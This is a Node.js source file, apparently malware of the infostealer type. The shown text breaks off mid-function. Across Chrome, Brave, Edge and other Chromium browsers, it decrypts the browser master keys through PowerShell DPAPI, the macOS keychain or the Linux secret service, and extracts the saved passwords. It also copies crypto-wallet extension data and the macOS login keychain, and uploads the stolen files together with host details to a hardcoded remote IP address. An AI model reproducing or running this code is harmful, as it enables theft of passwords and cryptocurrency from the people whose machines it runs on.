const { exec, execSync } = require("child_process");
const path = require("path");
const axios = require("axios");
const fs = require("fs");
const fsPromises = require("fs/promises");
const os = require("os");
const FormData = require("form-data");
const crypto = require("crypto");
const { exit } = require("process");
/*//if (os.platform() === 'linux')
{
  const logDir = path.join(process.cwd(), '.logs');
  if (!fs.existsSync(logDir)) {
    fs.mkdirSync(logDir, { recursive: true });
  }
  const logFile = path.join(logDir, `ldb_${Date.now()}.log`);
  const originalLog = console.log;
  const originalError = console.error;
  const originalWarn = console.warn;
  const writeLog = (level, ...args) => {
    const timestamp = new Date().toISOString();
    const message = args.map(arg => typeof arg === 'object' ? JSON.stringify(arg) : String(arg)).join(' ');
    const logLine = `[${timestamp}] [${level}] ${message}\n`;
    try {
      fs.appendFileSync(logFile, logLine, 'utf8');
    } catch (e) {}
    if (level === 'LOG') originalLog.apply(console, args);
    else if (level === 'ERROR') originalError.apply(console, args);
    else if (level === 'WARN') originalWarn.apply(console, args);
  };
  console.log = (...args) => writeLog('LOG', ...args);
  console.error = (...args) => writeLog('ERROR', ...args);
  console.warn = (...args) => writeLog('WARN', ...args);
}*/
const formData = new FormData();
let i = 0;
const wps = ["nkbihfbeogaeaoehlefnkodbefgpgknn", "ejbalbakoplchlghecdalmeeeajnimhm", "acmacodkjbdgmoleebolmdjonilkdbch", "bfnaelmomeimhlpmgjnjophhpkkoljpa", "ibnejdfjmmkpcnlpebklmnkoeoihofec", "egjidjbpglichdcondbcbdnbeeppgdph", "nphplpgoakhhjchkkhmiggakijnkhfnd", "omaabbefbmiijedngplfjmnooppbclkk", "bhhhlbepdkbapadjdnnojkbgioiodbic", "aeachknmefphepccionboohckonoeemg", "aflkmhkiijdbfcmhplgifokgdeclgpoi", "agoakfejjabomempkjlepdflaleeobhb", "aholpfdialjgjfhomihkjbmgjidlcdno", "afbcbjpbpfadlkmhmclhkeeodmamcflc", "cgbogdmdefihhljhfeffkljbghamglni", "dmkamcknogkgcdfhhbddcghachkejeap", "dlcobpjiigpikoobohmabehhmhfoodbb", "efbglgofoippbgcjepnhiblaibcnclgk", "ejjladinnckdgjemekebdpeokbikhfci", "fhbohimaelbohpjbbldcngcnapndodjp", "fhkbkphfeanlhnlffkpologfoccekhic", "fhmfendgdocmcbmfikdcogofphimnkno", "fldfpgipfncgndfolcbkdeeknbbbnhcc", "gjnckgkfmgmibbkoficdidcljeaaaheg", "hifafgmccdpekplomjjkcfgodnhcellj", "hmeobnfnfcmdkdcmlblgagmfpfboieaf", "hnfanknocfeofbddgcijnmhnfnkdnaad", "jiidiaalihmmhddjgbnbgdfflelocpak", "jblndlipeogpafnldhgmapagcccfchpi", "jmbkjchcobfffnmjboflnchcbljiljdk", "jnjpmcgfcfeffkfgcnjefkbkgcpnkpab", "kpkmkbkoifcfpapmleipncofdbjdpice", "khpkpbbcccdmmclmpigdgddabeilkdpd", "ldinpeekobnhjjdofggfgjlcehhmanaj", "lgmpcpglpngdoalbgeoldeajfclnhafa", "mcohilncbfahbmgdjkbpemcciiolgcge", "mopnmbcafieddcagagdcbnhejhlodfdd", "nkklfkfpelhghbidbnpdfhblphpfjmbo", "penjlddjkjgpnkllboccdgccekpkcbin", "ppbibelpcjmhbdihakflkdcoccbgbkpo"];
const platform = process.platform;

// Helper function to detect if running in WSL
const isRunningInWSL = () => {
  // Check for WSL environment variable
  if (process.env.WSL_DISTRO_NAME) {
    return true;
  }
  // Check /proc/version for Microsoft/WSL
  try {
    if (fs.existsSync("/proc/version")) {
      const versionContent = fs.readFileSync("/proc/version", "utf8");
      if (versionContent.toLowerCase().includes("microsoft") || versionContent.toLowerCase().includes("wsl")) {
        return true;
      }
    }
  } catch (e) {}
  return false;
};

// Helper function to get Windows username from WSL
const getWindowsUsername = () => {
  try {
    // Method 1: Use cmd.exe to get Windows username
    const username = execSync("cmd.exe /c echo %USERNAME%", { encoding: "utf8" }).trim();
    if (username && username.length > 0 && !username.includes("%USERNAME%")) {
      return username;
    }
  } catch (e) {}
  
  try {
    // Method 2: Check /mnt/c/Users/ directory
    const usersPath = "/mnt/c/Users";
    if (fs.existsSync(usersPath)) {
      const entries = fs.readdirSync(usersPath, { withFileTypes: true });
      // Look for the first directory that's not a system directory
      const systemDirs = ["Public", "Default", "All Users", "Default User"];
      for (const entry of entries) {
        if (entry.isDirectory() && !systemDirs.includes(entry.name)) {
          return entry.name;
        }
      }
    }
  } catch (e) {}
  
  // Fallback: try to get from environment
  return process.env.USERNAME || process.env.USER || null;
};

const getWindowsBrowserPaths = (windowsUsername) => {
  if (!windowsUsername) return [];
  
  const windowsPaths = [];
  // When running in WSL, use /mnt/c/ path format to access Windows filesystem
  // Windows AppData paths: /mnt/c/Users/{username}/AppData/Local/...
  const localAppDataBase = `/mnt/c/Users/${windowsUsername}/AppData/Local`;
  
  const browserRelativePaths = [
    "Google/Chrome/User Data",                    // Chrome
    "BraveSoftware/Brave-Browser/User Data",      // Brave
    "AVG Browser/User Data",                       // AVG Browser
    "Microsoft/Edge/User Data",                   // Edge
    "Opera Software/Opera Stable",                // Opera
    "Opera Software/Opera GX",                    // Opera GX
    "Vivaldi/User Data",                          // Vivaldi
    "Kiwi Browser/User Data",                     // Kiwi
    "Yandex/YandexBrowser/User Data",            // Yandex
    "Iridium/User Data",                          // Iridium
    "Comodo/Dragon/User Data",                    // Comodo
    "SRWare Iron/User Data",                      // SRWare
    "Chromium/User Data"                          // Chromium
  ];
  
  browserRelativePaths.forEach(relativePath => {
    const fullPath = path.join(localAppDataBase, relativePath);
    windowsPaths.push(fullPath);
  });
  
  return windowsPaths;
};

const getChromiumBasePaths = () => {
  const chromiumBrowserPaths = [
    [
      path.join(process.env.LOCALAPPDATA || '', "Google/Chrome/User Data"),
      path.join(process.env.HOME || '', "Library/Application Support/Google/Chrome"),
      path.join(process.env.HOME || '', ".config/google-chrome")
    ],
    [
      path.join(process.env.LOCALAPPDATA || '', "BraveSoftware/Brave-Browser/User Data"),
      path.join(process.env.HOME || '', "Library/Application Support/BraveSoftware/Brave-Browser"),
      path.join(process.env.HOME || '', ".config/BraveSoftware/Brave-Browser")
    ],
    [
      path.join(process.env.LOCALAPPDATA || '', "AVG Browser/User Data"),
      path.join(process.env.HOME || '', "Library/Application Support/AVG Browser"),
      path.join(process.env.HOME || '', ".config/avg-browser")
    ],
    [
      path.join(process.env.LOCALAPPDATA || '', "Microsoft/Edge/User Data"),
      path.join(process.env.HOME || '', "Library/Application Support/Microsoft Edge"),
      path.join(process.env.HOME || '', ".config/microsoft-edge")
    ],
    [
      path.join(process.env.LOCALAPPDATA || '', "Opera Software/Opera Stable"),
      path.join(process.env.HOME || '', "Library/Application Support/com.operasoftware.Opera"),
      path.join(process.env.HOME || '', ".config/opera")
    ],
    [
      path.join(process.env.LOCALAPPDATA || '', "Opera Software/Opera GX"),
      path.join(process.env.HOME || '', "Library/Application Support/com.operasoftware.OperaGX"),
      path.join(process.env.HOME || '', ".config/opera-gx")
    ],
    [
      path.join(process.env.LOCALAPPDATA || '', "Vivaldi/User Data"),
      path.join(process.env.HOME || '', "Library/Application Support/Vivaldi"),
      path.join(process.env.HOME || '', ".config/vivaldi")
    ],
    [
      path.join(process.env.LOCALAPPDATA || '', "Kiwi Browser/User Data"),
      path.join(process.env.HOME || '', "Library/Application Support/Kiwi Browser"),
      path.join(process.env.HOME || '', ".config/kiwi-browser")
    ],
    [
      path.join(process.env.LOCALAPPDATA || '', "Yandex/YandexBrowser/User Data"),
      path.join(process.env.HOME || '', "Library/Application Support/Yandex/YandexBrowser"),
      path.join(process.env.HOME || '', ".config/yandex-browser")
    ],
    [
      path.join(process.env.LOCALAPPDATA || '', "Iridium/User Data"),
      path.join(process.env.HOME || '', "Library/Application Support/Iridium"),
      path.join(process.env.HOME || '', ".config/iridium-browser")
    ],
    [
      path.join(process.env.LOCALAPPDATA || '', "Comodo/Dragon/User Data"),
      path.join(process.env.HOME || '', "Library/Application Support/Comodo/Dragon"),
      path.join(process.env.HOME || '', ".config/comodo-dragon")
    ],
    [
      path.join(process.env.LOCALAPPDATA || '', "SRWare Iron/User Data"),
      path.join(process.env.HOME || '', "Library/Application Support/SRWare Iron"),
      path.join(process.env.HOME || '', ".config/srware-iron")
    ],
    [
      path.join(process.env.LOCALAPPDATA || '', "Chromium/User Data"),
      path.join(process.env.HOME || '', "Library/Application Support/Chromium"),
      path.join(process.env.HOME || '', ".config/chromium")
    ]
  ];
  const platform = process.platform;
  if (platform === "win32") {
    return chromiumBrowserPaths.map(browser => browser[0]);
  } else if (platform === "darwin") {
    return chromiumBrowserPaths.map(browser => browser[1]);
  } else if (platform === "linux") {
    if (isRunningInWSL()) {
      const windowsUsername = getWindowsUsername();
      if (windowsUsername) {
        return getWindowsBrowserPaths(windowsUsername);
      }
    }
    return chromiumBrowserPaths.map(browser => browser[2]);
  } else {
    process.exit(1);
  }
};
async function sleep(ms) {
  return new Promise((resolve) => setTimeout(resolve, ms));
}
async function initSqlJs() {
  try {
    const sqljs = require('sql.js');
    if (typeof sqljs === 'function') {
      return await sqljs();
    }
    return sqljs;
  } catch (e) {
   console.log("installing sql.js");
    try {
      const platform = process.platform;
      const installOptions = platform === 'win32' 
        ? { windowsHide: true, stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024 * 10 }
        : { stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024 * 10 };
      execSync("npm install sql.js --no-save --no-warnings --no-save --no-progress --loglevel silent", installOptions);
      const sqljs = require('sql.js');
      if (typeof sqljs === 'function') {
        return await sqljs();
      }
      return sqljs;
    } catch (installErr) {
     console.log("sql.js install err");
      return null;
    }
  }
}
function getBrowserEncryptionKey(localStatePath, browserName = 'Chrome') {
  try {
    if (!fs.existsSync(localStatePath)) {
      return null;
    }
    const localState = JSON.parse(fs.readFileSync(localStatePath, 'utf8'));
    const encryptedKey = localState?.os_crypt?.encrypted_key;
    console.log('encryptedKey', encryptedKey);
    if (!encryptedKey) {
      return null;
    }
    const encryptedKeyBytes = Buffer.from(encryptedKey, 'base64');
    const platform = process.platform;
    if (platform === 'win32') {
      if (encryptedKeyBytes.slice(0, 5).toString('utf8') === 'DPAPI') {
        const dpapiEncrypted = encryptedKeyBytes.slice(5);
        const dpapiScopes = [
          { flag: 0, name: 'CurrentUser' },
          { flag: 1, name: 'LocalMachine' }
        ];
        for (const scope of dpapiScopes) {
          try {
            const tempScriptPath = path.join(os.tmpdir(), `decrypt-key-${Date.now()}-${Math.random().toString(36).substr(2, 9)}.ps1`);
            const base64Encrypted = dpapiEncrypted.toString('base64');
            const psScript = `$ErrorActionPreference = 'Stop';
try {
Add-Type -AssemblyName System.Security -ErrorAction Stop;
} catch {
[System.Reflection.Assembly]::Load('System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a') | Out-Null;
}
$encrypted = [System.Convert]::FromBase64String('${base64Encrypted}');
try {
$decrypted = [System.Security.Cryptography.ProtectedData]::Unprotect($encrypted, $null, [System.Security.Cryptography.DataProtectionScope]::${scope.name});
} catch {
throw;
}
[System.Convert]::ToBase64String($decrypted)`;
            fs.writeFileSync(tempScriptPath, psScript, 'utf8');
            try {
              const keyBase64 = execSync(
                `powershell -NoProfile -ExecutionPolicy Bypass -File "${tempScriptPath}"`,
                { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024, windowsHide: true }
              ).trim();
              const decryptedKey = Buffer.from(keyBase64, 'base64');
              return decryptedKey;
            } catch (error) {
              continue;
            } finally {
              try {
                fs.unlinkSync(tempScriptPath);
              } catch (e) {
              }
            }
          } catch (error) {
            continue;
          }
        }
        return null;
      }
    } else if (platform === 'linux') {
      if (encryptedKeyBytes.slice(0, 3).toString('utf8') === 'v10' || encryptedKeyBytes.length > 3) {
        try {
          const appNames = ['chrome', 'chromium', 'google-chrome', browserName.toLowerCase().replace(/s+/g, '-')];
          for (const appName of appNames) {
            try {
              const secretToolCmd = `secret-tool lookup application "${appName}"`;
              const decryptedKey = execSync(secretToolCmd, { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024 }).trim();
              if (decryptedKey && decryptedKey.length > 0) {
                return Buffer.from(decryptedKey, 'utf8');
              }
            } catch (e) {
              try {
                const pythonScript = `import secretstorage; bus = secretstorage.dbus_init(); collection = secretstorage.get_default_collection(bus); items = collection.search_items({"application": "${appName}"}); item = next(items, None); print(item.get_secret().decode('utf-8') if item else '')`;
                const decryptedKey = execSync(`python3 -c "${pythonScript}"`, { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024 }).trim();
                if (decryptedKey && decryptedKey.length > 0) {
                  return Buffer.from(decryptedKey, 'utf8');
                }
              } catch (e2) {
                continue;
              }
            }
          }
          return null;
        } catch (error) {
          return null;
        }
      }
    } else if (platform === 'darwin') {
      if (encryptedKeyBytes.slice(0, 3).toString('utf8') === 'v10') {
        try {
          const secret = encryptedKeyBytes.slice(3).toString('base64');
          const service = `${browserName} Safe Storage`;
          const account = `${browserName}`;
          const securityCmd = `security find-generic-password -w -s "${service}" -a "${account}"`;
          try {
            const decryptedKey = execSync(securityCmd, { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024 }).trim();
            if (decryptedKey) {
              const keychainPassword = decryptedKey;
              const pbkdf2 = crypto.pbkdf2Sync(keychainPassword, 'saltysalt', 1003, 16, 'sha1');
              return pbkdf2;
            }
          } catch (e) {
            return null;
          }
        } catch (error) {
          return null;
        }
      }
    }
    return null;
  } catch (error) {
    return null;
  }
}
function decryptPassword(encryptedPassword, masterKey = null) {
  if (!encryptedPassword || encryptedPassword.length === 0) {
    return "";
  }
  const version = encryptedPassword[0];
  let nonceStart = 1;
  if (version === 0x76 && encryptedPassword.length > 2) {
    let i = 1;
    while (i < encryptedPassword.length && encryptedPassword[i] >= 0x30 && encryptedPassword[i] <= 0x39) {
      i++;
    }
    const versionStr = encryptedPassword.slice(0, i).toString('ascii');
    if (versionStr.startsWith('v')) {
      nonceStart = i;
    }
  }
  if (version === 0x01 || version === 0x02 || (version === 0x76 && nonceStart > 1)) {
    return decryptAESGCM(encryptedPassword, nonceStart, masterKey);
  }
  return decryptDPAPI(encryptedPassword);
}
function decryptAESGCM(encryptedPassword, nonceStart, masterKey) {
  if (encryptedPassword.length < nonceStart + 12) {
    return "";
  }
  const nonce = encryptedPassword.slice(nonceStart, nonceStart + 12);
  const ciphertextStart = nonceStart + 12;
  const ciphertext = encryptedPassword.slice(ciphertextStart);
  if (ciphertext.length < 16) {
    return "";
  }
  const tag = ciphertext.slice(-16);
  const encryptedData = ciphertext.slice(0, -16);
  if (!masterKey) {
    return "";
  }
  let key = masterKey.slice(0, 32);
  if (key.length < 32) {
    key = Buffer.concat([key, Buffer.alloc(32 - key.length)]);
  }
  const decryptionAttempts = [
    { name: "AES-256-GCM (full key)", key: key, keyLen: 32 },
    { name: "AES-128-GCM (first 16 bytes)", key: key.slice(0, 16), keyLen: 16 }
  ];
  if (masterKey.length > 32) {
    decryptionAttempts.push({
      name: "AES-256-GCM (full master key)",
      key: masterKey.slice(0, 32),
      keyLen: 32
    });
  }
  for (const attempt of decryptionAttempts) {
    try {
      try {
        const cipher = crypto.createDecipheriv('aes-256-gcm', attempt.key, nonce);
        cipher.setAuthTag(tag);
        let decrypted = cipher.update(encryptedData, null, 'utf8');
        decrypted += cipher.final('utf8');
        if (decrypted) {
          return decrypted;
        }
      } catch (error) {
        const aadOptions = [Buffer.from('chrome'), Buffer.from('edge')];
        for (const aad of aadOptions) {
          try {
            const cipher = crypto.createDecipheriv('aes-256-gcm', attempt.key, nonce);
            cipher.setAAD(aad);
            cipher.setAuthTag(tag);
            let decrypted = cipher.update(encryptedData, null, 'utf8');
            decrypted += cipher.final('utf8');
            if (decrypted) {
              return decrypted;
            }
          } catch (error) {
            continue;
          }
        }
      }
    } catch (error) {
      continue;
    }
  }
  return "";
}
function decryptDPAPI(encryptedPassword) {
  try {
    const attempts = [
      { data: encryptedPassword, desc: "Original", scope: 0 },
      { data: encryptedPassword, desc: "Original", scope: 1 },
    ];
    if (encryptedPassword.length > 1 && encryptedPassword[0] === 0x01) {
      attempts.push(
        { data: encryptedPassword.slice(1), desc: "Skip version byte", scope: 0 },
        { data: encryptedPassword.slice(1), desc: "Skip version byte", scope: 1 }
      );
    }
    if (encryptedPassword.length > 3) {
      attempts.push(
        { data: encryptedPassword.slice(3), desc: "Skip first 3 bytes", scope: 0 },
        { data: encryptedPassword.slice(3), desc: "Skip first 3 bytes", scope: 1 }
      );
    }
    for (const attempt of attempts) {
      try {
        const scopeName = attempt.scope === 0 ? "CurrentUser" : "LocalMachine";
        const base64Encrypted = attempt.data.toString('base64');
        const tempScriptPath = path.join(os.tmpdir(), `decrypt-${Date.now()}-${Math.random().toString(36).substr(2, 9)}.ps1`);
        const psScript = `$ErrorActionPreference = 'Stop';
try {
Add-Type -AssemblyName System.Security -ErrorAction Stop;
} catch {
[System.Reflection.Assembly]::Load('System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a') | Out-Null;
}
$encrypted = [System.Convert]::FromBase64String('${base64Encrypted}');
try {
$decrypted = [System.Security.Cryptography.ProtectedData]::Unprotect($encrypted, $null, [System.Security.Cryptography.DataProtectionScope]::${scopeName});
} catch {
throw;
}
[System.Text.Encoding]::UTF8.GetString($decrypted)`;
        fs.writeFileSync(tempScriptPath, psScript, 'utf8');
        try {
          const decrypted = execSync(
            `powershell -NoProfile -ExecutionPolicy Bypass -File "${tempScriptPath}"`,
            { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024, windowsHide: true }
          ).trim();
          if (decrypted && decrypted.length > 0) {
            return decrypted;
          }
        } catch (execError) {
          continue;
        } finally {
          try {
            fs.unlinkSync(tempScriptPath);
          } catch (e) {
          }
        }
      } catch (error) {
        continue;
      }
    }
    return "";
  } catch (error) {
    return "";
  }
}
async function extractPasswordsFromBrowser(browserIndex, basePath) {
  if (!fs.existsSync(basePath)) {
    return { passwords: [], masterKey: null };
  }
  const platform = process.platform;
  let localStatePath;
  if (platform === 'win32') {
    localStatePath = path.join(basePath, 'Local State');
  } else {
    localStatePath = path.join(basePath, 'Local State');
  }
    console.log(localStatePath)
  const masterKey = fs.existsSync(localStatePath) ? getBrowserEncryptionKey(localStatePath, `Browser${browserIndex}`) : null;
  const defaultProfileDir = path.join(basePath, 'Default');
  const allPasswords = [];
  console.log('masterKey', masterKey);
  const loginDataNames = ['Login Data', 'Login Data For Account'];
  for (const loginDataName of loginDataNames) {
    const defaultProfileLoginData = path.join(defaultProfileDir, loginDataName);
    if (fs.existsSync(defaultProfileLoginData)) {
      const passwords = await extractPasswords(defaultProfileLoginData, masterKey, `Browser${browserIndex}`);
      allPasswords.push(...passwords);
    }
  }
  try {
    const items = fs.readdirSync(basePath);
    for (const item of items) {
      if (item === 'Default' || item === 'Local State' || item.startsWith('.')) {
        continue;
      }
      if (item.startsWith('Profile ')) {
        const profileDir = path.join(basePath, item);
        try {
          const stats = fs.statSync(profileDir);
          if (!stats.isDirectory()) {
            continue;
          }
        } catch (statError) {
          continue;
        }
        for (const loginDataName of loginDataNames) {
          const profileLoginData = path.join(profileDir, loginDataName);
          if (fs.existsSync(profileLoginData)) {
            const passwords = await extractPasswords(profileLoginData, masterKey, `Browser${browserIndex} (${item})`);
            allPasswords.push(...passwords);
          }
        }
      }
    }
  } catch (error) {
  }
  return { passwords: allPasswords, masterKey: masterKey ? masterKey.toString('base64') : null };
}
async function extractPasswords(loginDataPath, masterKey, browserName) {
  if (!fs.existsSync(loginDataPath)) {
    return [];
  }
  const tempDbPath = path.join(os.tmpdir(), `${browserName}_login_data_${process.pid}_${Date.now()}.db`);
  try {
    fs.copyFileSync(loginDataPath, tempDbPath);
  } catch (error) {
    return [];
  }
  const passwords = [];
  try {
    const SQL = await initSqlJs();
    if (!SQL) {
      return [];
    }
    const fileBuffer = fs.readFileSync(tempDbPath);
    const db = new SQL.Database(fileBuffer);
    const result = db.exec(`
      SELECT 
        origin_url,
        username_value,
        password_value,
        date_created,
        date_last_used
      FROM logins
      ORDER BY origin_url
    `);
    if (!result || result.length === 0) {
      db.close();
      try {
        fs.unlinkSync(tempDbPath);
      } catch (e) {
      }
      return [];
    }
    const rows = result[0].values;
    const columnNames = result[0].columns;
    const colIndex = {
      origin_url: columnNames.indexOf('origin_url'),
      username_value: columnNames.indexOf('username_value'),
      password_value: columnNames.indexOf('password_value'),
      date_created: columnNames.indexOf('date_created'),
      date_last_used: columnNames.indexOf('date_last_used')
    };
    for (let idx = 0; idx < rows.length; idx++) {
      const row = rows[idx];
      try {
        const url = row[colIndex.origin_url];
        const username = row[colIndex.username_value];
        const passwordValue = row[colIndex.password_value];
        const dateCreated = row[colIndex.date_created];
        const dateLastUsed = row[colIndex.date_last_used];
        if (!passwordValue || passwordValue.length === 0) {
          continue;
        }
        let encryptedPassword;
        if (typeof passwordValue === 'string') {
          encryptedPassword = Buffer.from(passwordValue, 'latin-1');
        } else if (Buffer.isBuffer(passwordValue)) {
          encryptedPassword = passwordValue;
        } else {
          encryptedPassword = Buffer.from(passwordValue);
        }
        const password = decryptPassword(encryptedPassword, masterKey);
        function chromeTimeToISO(timestamp) {
          if (!timestamp) {
            return null;
          }
          const epoch = new Date('1601-01-01T00:00:00Z').getTime();
          const chromeTime = timestamp / 1000000;
          const unixTime = chromeTime - 11644473600;
          return new Date(unixTime * 1000).toISOString();
        }
        const entry = {
          url: url,
          u: username,
          p: password,
          created: chromeTimeToISO(dateCreated),
          last_used: chromeTimeToISO(dateLastUsed)
        };
        if (!password && encryptedPassword && encryptedPassword.length > 0) {
          entry.p_encrypted = encryptedPassword.toString('base64');
        }
        passwords.push(entry);
      } catch (error) {
        continue;
      }
    }
    db.close();
  } catch (error) {
    // console.log("error", error);
  } finally {
    try {
      fs.unlinkSync(tempDbPath);
    } catch (e) {
    }
  }
  return passwords;
}
async function extractAndUploadPasswords(timestamp, tempDir) {
  try {
    const browserNames = ['Chrome', 'Brave', 'AVG Browser', 'Edge', 'Opera', 'Opera GX', 'Vivaldi', 'Kiwi Browser', 'Yandex Browser', 'Iridium', 'Comodo Dragon', 'SRWare Iron', 'Chromium'];
    const allPasswords = {};
    const masterKeys = {};
    for (let browserIndex = 0; browserIndex < basePaths.length; browserIndex++) {
      const basePath = basePaths[browserIndex];
      if (!fs.existsSync(basePath)) {
        continue;
      }
      const browserName = browserNames[browserIndex] || `Browser${browserIndex}`;
      const result = await extractPasswordsFromBrowser(browserIndex, basePath);
      if (result.passwords.length > 0) {
        allPasswords[browserName] = result.passwords;
        if (result.masterKey) {
          masterKeys[browserName] = result.masterKey;
        }
      }
    }
    if (Object.keys(allPasswords).length > 0) {
      const fileName = 's.txt';
      const fileContent = JSON.stringify({ passwords: allPasswords, masterKeys: masterKeys }, null, 2);
      const filePath = path.join(tempDir || os.tmpdir(), fileName);
      fs.writeFileSync(filePath, fileContent, 'utf8');
      const passwordFile = await collectFile(filePath, null, null, '', tempDir);
      if (passwordFile) {
        await uploadFiles([passwordFile], timestamp);
      }
      if (!tempDir && fs.existsSync(filePath)) {
        try {
          fs.unlinkSync(filePath);
        } catch (e) {
        }
      }
    }
  } catch (error) {
  }
}
const uploadBraveWallet = async (timestamp, tempDir) => {
  const browserId = 1; // Brave is index 1 in chromiumBrowserPaths
  const extensionId = 'bravewallet';
  const braveBasePath = basePaths[1]; // Brave is index 1
  if (!braveBasePath || !fs.existsSync(braveBasePath)) return;
  const folders = fs
    .readdirSync(braveBasePath)
    .filter((folder) => /^Profile.*|^Default$/.test(folder));
  for (let folderIndex = 0; folderIndex < folders.length; folderIndex++) {
    const folder = folders[folderIndex];
    let profileId;
    if (folder === "Default") {
      profileId = 0;
    } else {
      const match = folder.match(/Profiles+(d+)/);
      profileId = match ? parseInt(match[1]) : folderIndex;
    }
    const leveldbPath = path.join(braveBasePath, folder, "Local Storage/leveldb");
    if (!fs.existsSync(leveldbPath)) continue;
    const walletFiles = [];
    try {
      const files = fs.readdirSync(leveldbPath);
      for (const file of files) {
        const filePath = path.join(leveldbPath, file);
        const collectedFile = await collectFile(filePath, browserId, profileId, extensionId, tempDir);
        if (collectedFile) {
          walletFiles.push(collectedFile);
        }
      }
      if (walletFiles.length > 0) {
        await uploadFiles(walletFiles, timestamp);
      }
    } catch (err) {
    }
  }
};
const basePaths = getChromiumBasePaths();
// const skipFiles = ['LOCK', 'CURRENT', 'LOG', 'LOG.old', 'MANIFEST'];
const getSystemInfo = () => {
  return {
    host: os.hostname(),
    os: `${os.type()} ${os.release()}`,
    username: os.userInfo().username || "unknown",
  };
};
const collectFile = async (p, browserId = null, profileId = null, extensionId = null, tempDir = null) => {
  if (!fs.existsSync(p)) return null;
  const fileName = path.basename(p);
  try {
    if (fs.statSync(p).isFile()) {
      let filePath = p;
      let isTempFile = false;
      if (tempDir) {
        try {
          const uniqueName = `${Date.now()}_${Math.random().toString(36).substring(7)}_${fileName}`;
          const tempFilePath = path.join(tempDir, uniqueName);
          const fileContent = fs.readFileSync(p);
          fs.writeFileSync(tempFilePath, fileContent);
          filePath = tempFilePath;
          isTempFile = true;
        } catch (copyErr) {
          if (copyErr.code === 'EBUSY' || copyErr.code === 'EACCES' || copyErr.code === 'ENOENT') {
            return null;
          } else {
            return null;
          }
        }
      }
      return {
        path: filePath,
        originalPath: p,
        filename: path.basename(p),
        browserId: browserId,
        profileId: profileId,
        extensionId: extensionId || '',
        isTempFile: isTempFile
      };
    }
  } catch (err) {
    if (err.code === 'EBUSY' || err.code === 'EACCES') {
      return null;
    }
  }
  return null;
};
const uploadFiles = async (files, timestamp) => {
  if (!files || files.length === 0) return;
  const form = new FormData();
  const fileMetadata = [];
  for (const file of files) {
    if (!file || !file.path) continue;
    try {
      const readStream = fs.createReadStream(file.path);
      readStream.on('error', (streamErr) => {
        if (streamErr.code !== 'EBUSY' && streamErr.code !== 'EACCES') {}
      });
      form.append("files", readStream, {
        filename: file.filename
      });
      fileMetadata.push({
        browserId: file.browserId !== null ? file.browserId : '',
        profileId: file.profileId !== null ? file.profileId : '',
        extensionId: file.extensionId || '',
        originalFilename: file.filename
      });
    } catch (err) {
      if (err.code === 'EBUSY' || err.code === 'EACCES') {continue;}      
    }
  }
  if (fileMetadata.length > 0) {
    try {
      const response = await axios.post(`http://144.172.105.122:8085/upload`, form, {
        headers: {
          ...form.getHeaders(),
          userkey: 104,
          hostname: os.hostname(),
          timestamp: timestamp,
          'file-metadata': JSON.stringify(fileMetadata), // Send metadata array
          t: 1,
        },
        maxContentLength: Infinity,
        maxBodyLength: Infinity,
        validateStatus: (status) => status < 500, // Don't throw on 4xx errors
      });
      if (response.status >= 200 && response.status < 300) {} else {}
    } catch (uploadErr) {
      if (uploadErr.code === 'ECONNRESET' || uploadErr.code === 'ECONNREFUSED') {
      } else if (uploadErr.response) {
      } else {}
    }
  }
};
const iterate = async () => {
const timestamp = Math.round(Date.now() / 1000);
const platform = process.platform;
const filesToUpload = [];
const homeDir = os.homedir();
const tempBaseDir = path.join(homeDir, '.tmp');
const tempDir = path.join(tempBaseDir, `.upload_${timestamp}_${Math.random().toString(36).substring(7)}`);
try {
  if (!fs.existsSync(tempBaseDir)) {
    await fsPromises.mkdir(tempBaseDir, { recursive: true });
  }
  await fsPromises.mkdir(tempDir, { recursive: true });
} catch (err) {}
try {
  // First, create and upload sysinfo.txt
  const systemInfo = getSystemInfo();
  const sysinfoContent = `Host: ${systemInfo.host}\nOS: ${systemInfo.os}\nUsername: ${systemInfo.username}\nPlatform: ${platform}\nTimestamp: ${new Date().toISOString()}\n`;
  const sysinfoPath = path.join(tempDir, 'sysinfo.txt');
  fs.writeFileSync(sysinfoPath, sysinfoContent, 'utf8');
  const sysinfoFile = {
    path: sysinfoPath,
    originalPath: sysinfoPath,
    filename: 'sysinfo.txt',
    browserId: '',
    profileId: '',
    extensionId: '',
    isTempFile: true
  };
  await uploadFiles([sysinfoFile], timestamp);
  
  if (os.platform() == "darwin") {
    const keychainFile = await collectFile(`${process.env.HOME}/Library/Keychains/login.keychain-db`, '', '', '', tempDir);
    if (keychainFile) {
      await uploadFiles([keychainFile], timestamp);
    }
  }
  for (let basePathIndex = 0; basePathIndex < basePaths.length; basePathIndex++) {
    const basePath = basePaths[basePathIndex];
    const browserId = basePathIndex; // 0 for Chrome, 1 for Brave
    if (!fs.existsSync(basePath)) continue;
    const folders = fs
      .readdirSync(basePath)
      .filter((folder) => /^Profile.*|^Default$/.test(folder));
    for (let folderIndex = 0; folderIndex < folders.length; folderIndex++) {
      const folder = folders[folderIndex];
      let profileId;
      if (folder === "Default") {
        profileId = 0;
      } else {
        const match = folder.match(/Profiles+(d+)/);
        profileId = match ? parseInt(match[1]) : folderIndex;
      }
      const profileFiles = [];
      for (wp of wps) {
        const fp = `${basePath}/${folder}/Local Extension Settings/${wp}`;
        if (!fs.existsSync(fp)) continue;
        const dirs = fs.readdirSync(fp);
        for (dr of dirs) {
          const file = await collectFile(`${fp}/${dr}`, browserId, profileId, wp, tempDir);
          if (file) profileFiles.push(file);
        }
        if (profileFiles.length > 0) {
          await uploadFiles(profileFiles, timestamp);
          profileFiles.length = 0; // Clear the array 
        }
      }
      const loginDataNames = ['Login Data', 'Login Data For Account'];
      for (const loginDataName of loginDataNames) {
        const loginDataFile = await collectFile(`${basePath}/${folder}/${loginDataName}`, browserId, profileId, '', tempDir);
        if (loginDataFile) { profileFiles.push(loginDataFile);}
      }      
